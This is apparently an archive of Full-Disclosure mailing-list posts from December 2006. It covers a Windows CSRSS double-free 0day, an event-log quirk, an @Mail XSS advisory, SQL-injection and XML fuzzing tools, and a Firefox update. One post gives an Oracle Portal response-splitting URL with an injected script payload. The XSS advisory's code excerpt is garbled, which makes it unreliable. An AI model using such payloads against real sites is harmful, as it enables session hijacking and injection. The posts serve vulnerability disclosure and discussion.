no one could fill a whole month of bugs (a bug/day) when the vendor did 
good (!) work.

it's, again, a thing capitalism enforces. vendors sell immature 
soft-/hardware, and services, and let the customers do the beta testing. 
*that* should be defined illegal by governments! but guess what -- most, 
if not all of the western countries can be defined as fascist countries 
as (huge) corporations are the real entities in power.

that given, the guys you call 'blackmailers' are like Robin Hood. 
they're heroes.

(it was the same with brazil some months ago; they told the pharmacy 
corporations to sell their drugs for HIV infected people at a reasonable 
price to the brazilian govt, otherwise the govt would ignore patents and 
re-engineer and build the drugs themselves. again, the govt was 
perfectly right. however, pharmacy corporations' PR guys knew this and 
so they sold and sell the medicine to the price brazil was willing to 
pay...)

-- 
Timo Schoeler | http://riscworks.net/~tis | timo.schoeler at riscworks.net
RISCworks -- Perfection is a powerful message
Ex-ISP | RISC aficinados | Networking, Security, OpenBSD services
GPG Key fingerprint = l33t

What are you gonna do? Release the dogs?! Or the bees?! Or dogs with 
bees in their mouth so that when they bark they shoot bees at you? 
(Homer J. Simpson)



From endrazine at gmail.com  Thu Dec 21 13:09:43 2006
From: endrazine at gmail.com (endrazine)
Date: Thu, 21 Dec 2006 14:09:43 +0100
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <169373868.20061221152209@SECURITY.NNOV.RU>
References: <169373868.20061221152209@SECURITY.NNOV.RU>
Message-ID: <458A8797.7060603@gmail.com>

Heya lists & 3APA3A,

3APA3A a ?crit :
> Dear full-disclosure at lists.grok.org.uk,
>
> There  is  interesting  thing  with  event  logging on Windows. The only
> security  aspect  of  it  is  event log record tampering and performance
> degradation,  but  it may become sensitive is some 3rd party software is
> used for automated event log analysis.
>
> The   problem   is   a  kind  of  "Format  string"  vulnerability  where
> user-supplied  input  is  used  for  event log record. For ReportEvent()
> function  %1,  %2,  etc  have  a  special  meaning and are replaced with
> corresponding  string  from  lpStrings.  
It looks more like a variable replacement (like $0 $1 ... in bash shell) 
than a format string issue to me.
And it seems indeed to be a relevant information disclosure bug.


Cheers,

endrazine-



From 3APA3A at SECURITY.NNOV.RU  Thu Dec 21 13:41:41 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 21 Dec 2006 16:41:41 +0300
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista memory
	corruption 0day
In-Reply-To: <1627317058.20061221145817@SECURITY.NNOV.RU>
References: <1627317058.20061221145817@SECURITY.NNOV.RU>
Message-ID: <978639475.20061221164141@SECURITY.NNOV.RU>

Dear lists,

in  another  Russian  forum, Killer{R} made analysis on this issue using
Windows 2000 sources:

http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672

The  problem is in win32k.sys' function GetHardErrorText, which tries to
prepare  EXCEPTION  data  for  event  log, and seems to be some very old
debugging feature accidently left in production code since Windows 2000.

In Windows 2000 there is a peace of code like:

} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) {
strcpy( asLocal.Buffer, asLocal.Buffer+4 );

Killer{R}  assumes  the problem is in strcpy(), because it should not be
used for overlapping buffers, but at least ANSI implementation of strcpy
from  Visual  C  should be safe in this very situation (copying to lower
addresses).  May be code is different for Windows XP or vulnerability is
later in code.



--Thursday, December 21, 2006, 2:58:17 PM, you wrote to full-disclosure at lists.grok.org.uk:

3> Dear full-disclosure at lists.grok.org.uk,

3>   Since  it's  already  wide  spread on the public forums and exploit is
3>   published  on  multiple  sites and there is no way to stop it, I think
3>   it's time to alert lists about this.

3>   On the one of Russian forums:
3>   http://www.kuban.ru/forum_new/forum2/files/19124.html
3>   message  was  published  by  NULL  about  vulnerability  in Windows on
3>   processing   MessageBox()   with   MB_SERVICE_NOTIFICATION   flag  and
3>   message/caption  beggining with \??\. Vulnerability seems to be memory
3>   corruption  in  kernel  and  causes  system  crash  or  hang after few
3>   attempts.  It  seems  to happen because message is logged to event log
3>   and may point to some problem with event logs processing.

3>   Vulnerability details and code may be found here:
3>   http://www.security.nnov.ru/Gnews944.html

3>   There  is  potential  remote  exploitation vector if some service uses
3>   user-supplied  input  for  MessageBox() function. Messenger service is
3>   not  vulnerable  in  this way, because it prepends user-supplied input
3>   with additional string.

3>   I contacted Microsoft on this issue on December, 16.



-- 
~/ZARAZA
http://www.security.nnov.ru/



From mc at khamsa.net  Thu Dec 21 15:28:40 2006
From: mc at khamsa.net (Michele Cicciotti)
Date: Thu, 21 Dec 2006 16:28:40 +0100
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <20061221122536.6AA7A1D8F7C@supertolla.itapac.net>
References: <20061221122536.6AA7A1D8F7C@supertolla.itapac.net>
Message-ID: <20061221152829.901C01D8F71@supertolla.itapac.net>

> There  is  interesting  thing  with  event  logging on Windows. The only
> security  aspect  of  it  is  event log record tampering and performance
> degradation,  but  it may become sensitive is some 3rd party software is
> used for automated event log analysis.

I doubt this. The event logs don't contain the actual formatted string, because the template string is localized and only retrieved when the entry is displayed - what is logged is just a message id and the string inserts (see documentation for EVENTLOGRECORD). FormatMessage (which is used to build the full message to display to the user) isn't the culprit, either, because it doesn't operate recursively (that would have bizarre consequences, since FormatMessage also performs automatic line wrapping and indenting) - to prove it quickly and cheaply, make a copy of ntoskrnl.exe as "%1.exe" and try to run it: the error message you get back is prepared with FormatMessage (see kernel32, message table, entry 129), and it doesn't exhibit recursion

I think this is just a fairly minor bug/feature of the standard event log viewer, and wouldn't affect log analyzers, unless they implement this counterintuitive behavior (that was probably coded to support some pathological case where a single pass of formatting wasn't enough). But I expect log analyzers would rather work with the message source + id than the formatted display message, anyway

> Most  services  do  not escape any user-supplied input then constructing
> log  event.

They are not supposed to, in fact that would damage the log. A human being might be fooled (for example you could embed newlines and fake fields in multi-line messages), but an automatic analysis tool will always see exactly the parameters passed




From tim-security at sentinelchicken.org  Thu Dec 21 15:41:11 2006
From: tim-security at sentinelchicken.org (Tim)
Date: Thu, 21 Dec 2006 10:41:11 -0500
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <458A8797.7060603@gmail.com>
References: <169373868.20061221152209@SECURITY.NNOV.RU>
	<458A8797.7060603@gmail.com>
Message-ID: <20061221154111.GA3231@sentinelchicken.org>



> > There  is  interesting  thing  with  event  logging on Windows. The only
> > security  aspect  of  it  is  event log record tampering and performance
> > degradation,  but  it may become sensitive is some 3rd party software is
> > used for automated event log analysis.

Log tampering is a big concern, since it is trivial to change the
meaning of logs without touching the .evt files themselves.

However, there are other security concerns, at least when it comes to
the event viewer.  It downloads DLLs from remote systems when viewing
remote logs, parses the message resources and uses them to determine the
meaning of remote logs.  Anyone played with fuzzing the PE file format?


> > The   problem   is   a  kind  of  "Format  string"  vulnerability  where
> > user-supplied  input  is  used  for  event log record. For ReportEvent()
> > function  %1,  %2,  etc  have  a  special  meaning and are replaced with
> > corresponding  string  from  lpStrings.  
> It looks more like a variable replacement (like $0 $1 ... in bash shell) 
> than a format string issue to me.
> And it seems indeed to be a relevant information disclosure bug.

I have studied the FormatMessage() interface in my attempt to interpret
event logs[1], but I had no idea that the "%n" elements were replaced
recursively.  That could be significant, since format strings *can* be
included as a modifier for those elements.  See [2] for more details.

3APA3A, have you tried to see if elements like "%n!FORMAT!" used
recursively will invoke the wsprintf()-like behavior??

cheers,
tim


[1] http://projects.sentinelchicken.org/grokevt/

[2] http://msdn.microsoft.com/library/en-us/debug/base/formatmessage.asp



From mc at khamsa.net  Thu Dec 21 15:20:54 2006
From: mc at khamsa.net (Michele Cicciotti)
Date: Thu, 21 Dec 2006 16:20:54 +0100
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <20061221122536.6AA7A1D8F7C@supertolla.itapac.net>
References: <20061221122536.6AA7A1D8F7C@supertolla.itapac.net>
Message-ID: <20061221152104.A96731D8F79@supertolla.itapac.net>

> There  is  interesting  thing  with  event  logging on Windows. The only
> security  aspect  of  it  is  event log record tampering and performance
> degradation,  but  it may become sensitive is some 3rd party software is
> used for automated event log analysis.

I doubt this. The event logs don't contain the actual formatted string, because the template string is localized and only retrieved when the entry is displayed - what is logged is just a message id and the string inserts (see documentation for EVENTLOGRECORD). FormatMessage (which is used to build the full message to display to the user) isn't the culprit, either, because it doesn't operate recursively (that would have bizarre consequences, since FormatMessage also performs automatic line wrapping and indenting) - to prove it quickly and cheaply, make a copy of ntoskrnl.exe as "%1.exe" and try to run it: the error message you get back is prepared with FormatMessage (see kernel32, message table, entry 129), and it doesn't exhibit recursion

I think this is just a fairly minor bug/feature of the standard event log viewer, and wouldn't affect log analyzers, unless they implement this counterintuitive behavior (that was probably coded to support some pathological case where a single pass of formatting wasn't enough). But I expect log analyzers would rather work with the message source + id than the formatted display message, anyway

> Most  services  do  not escape any user-supplied input then constructing
> log  event.

They are not supposed to, in fact that would damage the log. A human being might be fooled (for example you could embed newlines and fake fields in multi-line messages), but an automatic analysis tool will always see exactly the parameters passed




From contact at metaeye.org  Thu Dec 21 15:31:02 2006
From: contact at metaeye.org (Metaeye SG)
Date: Thu, 21 Dec 2006 21:01:02 +0530
Subject: [Full-disclosure] SQID v0.1 - SQL Injection Digger.
Message-ID: <458AA8B6.8000406@metaeye.org>

SQL injection digger is a command line program that looks for SQL
injections and common errors in websites.Current version looks for SQL
injections and common errors in website urls found by performing a
google search.

Sqiud can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org



From 3APA3A at SECURITY.NNOV.RU  Thu Dec 21 16:27:09 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 21 Dec 2006 19:27:09 +0300
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <20061221154111.GA3231@sentinelchicken.org>
References: <169373868.20061221152209@SECURITY.NNOV.RU>
	<458A8797.7060603@gmail.com>
	<20061221154111.GA3231@sentinelchicken.org>
Message-ID: <1067730950.20061221192709@SECURITY.NNOV.RU>

Dear Tim,

--Thursday, December 21, 2006, 6:41:11 PM, you wrote to endrazine at gmail.com:


T> 3APA3A, have you tried to see if elements like "%n!FORMAT!" used
T> recursively will invoke the wsprintf()-like behavior??

Yes, I did. It doesn't work.

-- 
~/ZARAZA
?? ???? ???? ?????? ????? ?????? ? ?????? ????, ????? ? ????????. (???)



From 3APA3A at SECURITY.NNOV.RU  Thu Dec 21 17:13:14 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 21 Dec 2006 20:13:14 +0300
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <20061221152104.A96731D8F79@supertolla.itapac.net>
References: <20061221122536.6AA7A1D8F7C@supertolla.itapac.net>
	<20061221152104.A96731D8F79@supertolla.itapac.net>
Message-ID: <1847409186.20061221201314@SECURITY.NNOV.RU>

Dear Michele Cicciotti,

--Thursday, December 21, 2006, 6:20:54 PM, you wrote to full-disclosure at lists.grok.org.uk:

>> There  is  interesting  thing  with  event  logging on Windows. The only
>> security  aspect  of  it  is  event log record tampering and performance
>> degradation,  but  it may become sensitive is some 3rd party software is
>> used for automated event log analysis.

MC> I doubt this. The event logs don't contain the actual formatted
MC> string, because the template string is localized and only retrieved
MC> when the entry is displayed - what is logged is just a message id
MC> and the string inserts (see documentation for EVENTLOGRECORD).
MC> FormatMessage (which is used to build the full message to display to
MC> the user) isn't the culprit, either, because it doesn't operate
MC> recursively (that would have bizarre consequences, since

As  I  wrote,  my message is semi-offtopic, because it's more fun than
any  security  vulnerability  here.

Yes,  probably  this  bug  only  affects  event  viewer  itself. I don't
understand  how  and why Microsoft achieved this effect in event viewer,
which  is,  by  the  way,  security tool, and if it's hard for different
vendor  to  make  same  mistake. It doesn't look like Easter egg, but if
FormatMessage  does  not recursion it needs to be specially coded and it
does  nothing  except this bug. Bug, that needs to be specially coded is
new funny bug category, isn't it?

-- 
~/ZARAZA
http://www.security.nnov.ru/



From advisories at netragard.com  Thu Dec 21 16:46:53 2006
From: advisories at netragard.com (Netragard Security Advisories)
Date: Thu, 21 Dec 2006 11:46:53 -0500
Subject: [Full-disclosure] [NETRAGARD-20061220 SECURITY ADVISORY] [@Mail
 WebMail Cross Site Scripting Vulnerabilitity]
Message-ID: <458ABA7D.4050808@netragard.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory* *******************

			
                     Strategic Reconnaissance Team

              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."





[POSTING NOTICE]
- ----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.


Netragard Research






[About Netragard]
- ----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools.  This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
- ----------------------------------------------------------------------
Contact				: Adriel T. Desautels
Researcher			: Philippe C. Caturegli
Advisory ID			: NETRAGARD-20061206
Product Name			: @ Mail
Product Version			: 4.51
Vendor Name			: Calacode
Type of Vulnerability		: XSS with filter evasion technique.
Effort				: Easy

- ----------------------------------------------------------------------
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
- ----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device."


- --http://www.atmail.com--





[Technical Summary]
- ----------------------------------------------------------------------
@Mail does not properly sanitize email. While @Mail does pre-append
a  tags. This failure makes @Mail vulnerable to Cross-site
Scripting Attacks ("XSS") via filter evasion.





[Technical Details]
- ----------------------------------------------------------------------
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.





- -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<-------
my ( $I1I11I11I11IIIII, $I1I111I1111II1II );$_ =
$I1111II1II1II1II->II1II1I11IIII111($I1I1II1II1I11II1);if (/)/ 635 SNIP -------8<-------

The above code will replace "
will then be executed when rendering an email with @Mail Webmail.

Please note that the email parser will also replace http:// by a 

*** The code above will display an alert if vulnerable ***

Note:
Netragard's Strategic Reconnaissance Team was able to use this issue
to hijack an @Mail users session.





[Vendor Status]
- ----------------------------------------------------------------------
Vendor Notified on 12/06/06
Vendor responded after 2 more notification attempts
Vendor issued a patch.
Vendor Comments (below):


"Just to confirm the first advisery you sent, NETRAGARD-20061206, has
already been fixed and included in the recent @Mail 4.61 patch for clients."






[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

> OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
>> with the file:
>>     
>
> This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
> mode, on a mailing list (fuzzing mailing list).
>
> I am not sure why I got this 10 times now, I thought the days of these
> bounces were over. But I am tired of seeing every full-disclosure
> vulnerability called a 0day anymore.
>
> A 0day, whatever definition you use, is used in the wild before people are
> aware of it.
It makes sense and I totally agree with you.
But the fact is that the things change (and not allways in the right 
direction :-()... due to the society, money, research of popularity...
Please remember us also the sense of the word "hacker" for instance, 
since nowadays it's often use to speak about "bad guy/blackhat/pirate" - 
i hope you'll agree that it's not the (our) sense

/JA



From mc at khamsa.net  Thu Dec 21 20:19:47 2006
From: mc at khamsa.net (Michele Cicciotti)
Date: Thu, 21 Dec 2006 21:19:47 +0100
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
In-Reply-To: <20061221171327.4C5AA1D8F80@supertolla.itapac.net>
References: <20061221122536.6AA7A1D8F7C@supertolla.itapac.net>
	<20061221152104.A96731D8F79@supertolla.itapac.net>
	<20061221171327.4C5AA1D8F80@supertolla.itapac.net>
Message-ID: <20061221201937.A157E1D8F7C@supertolla.itapac.net>

> Yes,  probably  this  bug  only  affects  event  viewer  itself. I don't
> understand  how  and why Microsoft achieved this effect in event viewer,
> which  is,  by  the  way,  security tool, and if it's hard for different
> vendor  to  make  same  mistake.

For what it's worth, the updated viewer in Windows Vista can show string inserts separately, in a list. IIRC its XML export function exports them separately, too




From asotirov at determina.com  Thu Dec 21 20:11:29 2006
From: asotirov at determina.com (Alexander Sotirov)
Date: Thu, 21 Dec 2006 12:11:29 -0800
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista
 memory	corruption 0day
In-Reply-To: <978639475.20061221164141@SECURITY.NNOV.RU>
References: <1627317058.20061221145817@SECURITY.NNOV.RU>
	<978639475.20061221164141@SECURITY.NNOV.RU>
Message-ID: <458AEA71.6060207@determina.com>

3APA3A wrote:
> Killer{R}  assumes  the problem is in strcpy(), because it should not be
> used for overlapping buffers, but at least ANSI implementation of strcpy
> from  Visual  C  should be safe in this very situation (copying to lower
> addresses).  May be code is different for Windows XP or vulnerability is
> later in code.

We discovered this bug some time ago and were preparing an advisory when it was
publicly disclosed. Since the exploit is already public, here's my analysis of
the vulnerability:

http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

It's a double free bug that leads to arbitrary code execution in the CSRSS process.

Alex



From nick at virus-l.demon.co.uk  Thu Dec 21 21:21:18 2006
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Date: Fri, 22 Dec 2006 10:21:18 +1300
Subject: [Full-disclosure] [WEB SECURITY] comparing information security
 to other industries
In-Reply-To: 
References: 
	
Message-ID: <458BB19E.23297.B0A4AA54@nick.virus-l.demon.co.uk>

Jason Muskat, GCFA, GCUX, de VE3TSJ wrote:

> People, programmers, computers, software, design patterns, systems, and
> infrastructure are constantly changing, often being reinvented. As such,
> will never be stable.
> 
> Concrete of a type is always the same and therefore predictable. One can
> state with certainly that a concrete slab will perform to design. This will
> ever be possible in IT.
> 
> Many commercially produced software products don?t have any warranty. Many
> even state that the software is not warranted for any function or purpose.

That's _because_ software makers argued long and hard for a special 
exemption from most standard producer liability regulations and laws, 
and in many cases also for protection from consumer protection laws.

They made this argument mainly along the lines you opened your comments 
with -- "everything is so complex and forever changing that if we had 
to do proper design, specification and testing we'd never produce 
anything and meeting those normal legal requirements would make 
everything ever so much less innovative and slower and only the very 
largest companies could ever afford to even think about writing 
software".

This -- particularly the "cost will bury us" part -- is _still_ the 
main argument the OSS folk make against any and all suggestions that 
software liability rules should be tightened up.

Thus, as NOT providing such guarantees is legally sanctioned, you 
cannot really use it as an argument supporting the "any old slop we put 
on the disk will do" approach we have sufferred from for far too long.

> ... The fact that the software does something that one thinks it should do
> is incidental. 

Yep.

Given you seem so strongly in favour of the current "couldn't really 
give a shit" view of software "quality", you'll be rushing to sign my 
petition requiriung all university and other educational courses in 
"computer science" to change their names to "computer art & craft" or 
"computer guesswork" or something similarly accurately describing their 
professional endorsement of hit-and-miss, slop it all in a bucket then 
pour it through a compiler we especially dumbed down to not give a rats 
arse about quality approach, and for "software engineering" courses to 
similarly remove their abuse use of the term "engineering"...


Regards,

Nick FitzGerald



From angray at beeb.net  Thu Dec 21 23:15:41 2006
From: angray at beeb.net (Aaron Gray)
Date: Thu, 21 Dec 2006 23:15:41 -0000
Subject: [Full-disclosure] Windows is very holy
References: 
Message-ID: <113301c72555$f23620f0$0200a8c0@AMD2500>

Sorry a dog not lions !
  ----- Original Message ----- 
  From: Aaron Gray 
  To: full-disclosure at lists.grok.org.uk 
  Sent: Thursday, December 21, 2006 2:28 AM
  Subject: [Full-disclosure] Windows is very holy


  Windows is very very holy.

  Microsoft may draw castles guarded by lions round PC's in adverts but we know better.

  Aaron



------------------------------------------------------------------------------


  _______________________________________________
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/


------------------------------------------------------------------------------


  No virus found in this incoming message.
  Checked by AVG Free Edition.
  Version: 7.1.409 / Virus Database: 268.15.25/593 - Release Date: 19/12/2006
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061221/121bfbc7/attachment.html 

From pukhraj.singh at gmail.com  Thu Dec 21 22:17:14 2006
From: pukhraj.singh at gmail.com (Pukhraj Singh)
Date: Thu, 21 Dec 2006 15:17:14 -0700
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista memory
	corruption 0day
In-Reply-To: <458AEA71.6060207@determina.com>
References: <1627317058.20061221145817@SECURITY.NNOV.RU>
	<978639475.20061221164141@SECURITY.NNOV.RU>
	<458AEA71.6060207@determina.com>
Message-ID: <1a9f19350612211417v28322f5j965d36befef3f366@mail.gmail.com>

Holy mackerel! Instances of this bug date back to 1999!

http://groups.google.ca/group/microsoft.public.win32.programmer.kernel/browse_thread/thread/c5946bf40f227058/7bd7b5d66a4e5aff

--Pukhraj

On 12/21/06, Alexander Sotirov  wrote:
> 3APA3A wrote:
> > Killer{R}  assumes  the problem is in strcpy(), because it should not be
> > used for overlapping buffers, but at least ANSI implementation of strcpy
> > from  Visual  C  should be safe in this very situation (copying to lower
> > addresses).  May be code is different for Windows XP or vulnerability is
> > later in code.
>
> We discovered this bug some time ago and were preparing an advisory when it was
> publicly disclosed. Since the exploit is already public, here's my analysis of
> the vulnerability:
>
> http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html
>
> It's a double free bug that leads to arbitrary code execution in the CSRSS process.
>
> Alex
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From Valdis.Kletnieks at vt.edu  Fri Dec 22 00:03:13 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 21 Dec 2006 19:03:13 -0500
Subject: [Full-disclosure] Windows is very holy
In-Reply-To: Your message of "Thu, 21 Dec 2006 23:15:41 GMT."
	<113301c72555$f23620f0$0200a8c0@AMD2500>
References: 
	<113301c72555$f23620f0$0200a8c0@AMD2500>
Message-ID: <200612220003.kBM03DRF003198@turing-police.cc.vt.edu>

On Thu, 21 Dec 2006 23:15:41 GMT, Aaron Gray said:

> Sorry a dog not lions !

Of course, even the most bad-ass canine can be taken down by sufficient
strength:

"Herakles asked Pouton [Haides] for Kerberos, and was told to take the hound if
he could overpower it without using any of the weapons he had brought with him.
He found Kerberos at the gates of Akheron, and there, pressed inside his armour
and totally covered by the lion's skin, he threw his arms round its head and
hung on, despite bites from the serpent-tail, until he convinced the beast with
his choke-hold. Then, with it in tow, he made his ascent through Troizen. After
showing Kerberos to Eurystheus, he took it back to Haides' realm." -
Apollodorus, The Library 2.125

or cleverness:

"Huge Cerberus, monstrously couched in a cave confronting them, made the whole
region echo with this three-throated barking. The Sibyl, seeing the snakes
bristling upon his neck now, threw him for bait a cake for honey and wheat
infused with sedative drugs. The creature, crazy with hunger, opened its three
mouths, gobbled the bait; then its huge body relaxed and lay, sprawled out on
the ground, the whole length of its cave kennel. Aeneas, passing its entrance,
the watch-dog neutralize, strode rapidly from the bank of that river [Styx] of
no return." - Virgil, Aeneid 6.417

http://www.theoi.com/Ther/KuonKerberos.html

There's a security-related moral somewhere in there. :)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061221/853d8739/attachment.bin 

From mc at khamsa.net  Fri Dec 22 00:58:19 2006
From: mc at khamsa.net (Michele Cicciotti)
Date: Fri, 22 Dec 2006 01:58:19 +0100
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista memory
	corruption 0day
In-Reply-To: <20061221232230.AFFD21D8F89@supertolla.itapac.net>
References: <1627317058.20061221145817@SECURITY.NNOV.RU>	<978639475.20061221164141@SECURITY.NNOV.RU>	<458AEA71.6060207@determina.com>
	<20061221232230.AFFD21D8F89@supertolla.itapac.net>
Message-ID: <20061222005808.2AA631D8F79@supertolla.itapac.net>

> Holy mackerel! Instances of this bug date back to 1999!

Different bug. That appears to be a trivial exhaustion of CSRSS worker threads through indiscriminate calls to MessageBox+MB_SERVICE_NOTIFICATION, which causes a DoS as no threads are available to serve kernel-mode requests from win32k, stalling GUI processes. I have done my fair share of CSRSS reversing in my better days, and I'm pretty sure that in Windows 2000 and later, a dedicated thread is used for such notifications, not just any thread, any time. Easily verifiable with local net sends and Spy++. It wasn't a "bug" either, more like a serious design flaw that ignored a very basic Win32 mantra ("don't do GUI in a worker thread") - not at all like this double-free




From jimpop at yahoo.com  Fri Dec 22 01:37:53 2006
From: jimpop at yahoo.com (Jim Popovitch)
Date: Thu, 21 Dec 2006 20:37:53 -0500
Subject: [Full-disclosure] Windows is very holy
In-Reply-To: 
References: 
Message-ID: <1166751473.15192.0.camel@localhost>

On Thu, 2006-12-21 at 02:28 +0000, Aaron Gray wrote:
> Windows is very very holy.

Don't you mean hole'y?  ;-)

-Jim P.



From jimpop at yahoo.com  Fri Dec 22 01:54:04 2006
From: jimpop at yahoo.com (Jim Popovitch)
Date: Thu, 21 Dec 2006 20:54:04 -0500
Subject: [Full-disclosure] Windows is very holy
In-Reply-To: <1166751473.15192.0.camel@localhost>
References: 
	<1166751473.15192.0.camel@localhost>
Message-ID: <1166752444.15192.13.camel@localhost>

On Thu, 2006-12-21 at 20:37 -0500, Jim Popovitch wrote:
> On Thu, 2006-12-21 at 02:28 +0000, Aaron Gray wrote:
> > Windows is very very holy.
> 
> Don't you mean hole'y?  ;-)

OK, why do I get bounce messages from 

  noreply at googlegroups.com (sub: Posting error: Secure Computing)

  postgateway at blogger.com (sub: Blogger post failed)

Seems to me that if you are smart enough to fwd email to a third place,
you would be smart enough to have it accept from everyone (not just
yourself).

-Jim P.



From andres.riancho at gmail.com  Thu Dec 21 14:19:58 2006
From: andres.riancho at gmail.com (Andres Riancho)
Date: Thu, 21 Dec 2006 11:19:58 -0300
Subject: [Full-disclosure] [TOOL] untidy - XML Fuzzer
Message-ID: 

List,

   I'm glad to release a beta version of untidy; untidy is general
purpose XML Fuzzer. It takes a string representation of a XML as input
and generates a set of modified, potentially invalid, XMLs based on
the input. It's released under GPL v2 and written in python.

   http://untidy.sourceforge.net/

Cheers,

-- 
Andres Riancho



From mc at khamsa.net  Fri Dec 22 03:23:34 2006
From: mc at khamsa.net (Michele Cicciotti)
Date: Fri, 22 Dec 2006 04:23:34 +0100
Subject: [Full-disclosure] Windows is very holy
In-Reply-To: <20061222014526.B92771D8F78@supertolla.itapac.net>
References: 
	<20061222014526.B92771D8F78@supertolla.itapac.net>
Message-ID: <20061222032327.CFAA61D8F78@supertolla.itapac.net>

> > Windows is very very holy.
> Don't you mean hole'y?  ;-)

Time for a gratuitous Sluggy Freelance reference!





From contact at metaeye.org  Fri Dec 22 11:49:32 2006
From: contact at metaeye.org (Metaeye SG)
Date: Fri, 22 Dec 2006 17:19:32 +0530
Subject: [Full-disclosure] SQID v0.2 - SQL Injection Digger.
Message-ID: <458BC64C.7010309@metaeye.org>

SQL injection digger is a command line program that looks for SQL
injections and common errors in websites.Current version looks for SQL
injections and common errors in website urls found by performing a
google search.

The use of google search SOAP API has been removed due to no more
issuing of keys. Now it directly performs search over the web.

Sqid can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org



From announce-noreply at rpath.com  Fri Dec 22 06:41:58 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 22 Dec 2006 01:41:58 -0500
Subject: [Full-disclosure] rPSA-2006-0234-1 firefox
Message-ID: <458b7e36.KkvFqYZaTJIKYlVt%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0234-1
Published: 2006-12-22
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    firefox=/conary.rpath.com at rpl:devel//1/1.5.0.9-0.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6497
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6498
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6501
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6502
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6503
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6505
    https://issues.rpath.com/browse/RPL-883

Description:
    Previous versions of the firefox package are vulnerable to multiple
    types of attacks, including one that enables an attacker to run
    arbitrary attacker-provided executable code if JavaScript is enabled.



From hasecorp at hotmail.com  Fri Dec 22 08:26:12 2006
From: hasecorp at hotmail.com (putosoft softputo)
Date: Fri, 22 Dec 2006 08:26:12 +0000
Subject: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Message-ID: 



>From: "Brian Eaton" 
>To: "putosoft softputo" 
>CC: bugtraq at securityfocus.com, full-disclosure at lists.grok.org.uk
>Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
>Date: Wed, 20 Dec 2006 13:55:09 -0500
>
>On 12/20/06, putosoft softputo  wrote:
>>Oracle Portal/Applications HTTP Response Splitting
>>--------------------------------------------------
>>
>>Sample:
>>
>>http:///webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
>
>So they let the URL specify the content-encoding?  They might be
